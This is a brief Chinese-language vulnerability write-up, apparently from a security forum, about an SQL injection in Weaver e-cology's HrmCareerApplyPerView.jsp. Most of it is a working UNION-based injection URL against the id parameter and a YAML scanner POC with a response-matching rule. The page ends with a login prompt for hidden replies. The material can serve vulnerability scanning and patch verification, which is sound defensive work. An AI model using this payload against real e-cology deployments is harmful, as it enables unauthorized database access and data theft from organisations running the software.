0x01 漏洞名称
泛微e-cology HrmCareerApplyPerView.jsp SQL注入漏洞
0x02 漏洞描述
泛微e-cology HrmCareerApplyPerView.jsp 存在SQL注入漏洞
0x03 漏洞复现
(1)访问/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7
0x04 漏洞POC
params: []
name: 泛微e-cology HrmCareerApplyPerView.jsp SQL注入漏洞
set: {}
rules:
- method: GET
path: /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"master")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
请登录后查看回复内容